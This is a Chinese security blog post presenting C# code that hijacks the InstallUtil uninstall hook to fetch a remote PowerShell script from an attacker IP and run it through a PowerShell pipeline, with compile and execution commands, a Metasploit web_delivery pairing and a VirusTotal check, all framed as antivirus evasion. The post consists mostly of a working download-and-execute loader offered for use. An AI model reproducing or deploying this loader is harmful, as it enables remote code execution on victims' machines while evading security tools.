Csharp使用Pipeline管道来执行PowerShell规避杀软

释放双眼,带上耳机,听听看~!

落地代码如下

using System;
using System.Net;
using System.IO;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Management.Automation.Runspaces;


public class Program
{
    public static void Main()
    {
        //Console.WriteLine("test");
    }
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        Mycode.Exec();
    }
}
public class Mycode
{
    public static void Exec()
    {
        WebClient client = new WebClient();
        //远程执行命令
        Stream stream = client.OpenRead("http://192.168.xxx.xxx/powershell.txt");
        StreamReader reader = new StreamReader(stream);
        String command = reader.ReadToEnd();
        //String command = "powershell.exe -c calc";
        //Console.WriteLine(text);

        //string command = System.IO.File.ReadAllText(text);
        RunspaceConfiguration rspacecfg = RunspaceConfiguration.Create();
        Runspace rspace = RunspaceFactory.CreateRunspace(rspacecfg);
        rspace.Open();
        Pipeline pipeline = rspace.CreatePipeline();
        pipeline.Commands.AddScript(command);
        pipeline.InvokeAsync();
        while (pipeline.PipelineStateInfo.State == PipelineState.Running || pipeline.PipelineStateInfo.State == PipelineState.Stopping)
        {
            System.Threading.Thread.Sleep(50);
        }
        Console.WriteLine("Installing...");

        foreach (object item in pipeline.Output.ReadToEnd())
        {
            if (item != null)
            {
                Console.WriteLine(item.ToString());
            }
        }
        foreach (object item in pipeline.Error.ReadToEnd())
        {
            if (item != null)
            {
                Console.WriteLine(item.ToString());
            }
        }
    }
}

保存为Program.cs文件后

在MSF上使用multi/script/web_delivery生成PSH模块

>C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /r:C:WindowsMicrosoft.NETassemblyGAC_MSILSystem.Management.Automationv4.0_3.0.0.0__31bf3856ad364e35System.Management.Automation.dll /unsafe /platform:anycpu /out:ps.exe Program.cs

>C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /logfile= /LogToConsole=True /u .ps.exe

其中DLL的文件可以通过powershell执行[psobject].Assembly.Location查询到

具体步骤如下图

VirusTotal查杀

文章摘选自神风师傅的博客 百度搜索 神风的博客即可看到

 

分类

加入BUGFOR

2021-4-18 14:04:27

分类

给XSS平台加上CF-CDN,并获取会话真实IP

2021-5-3 1:20:53

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索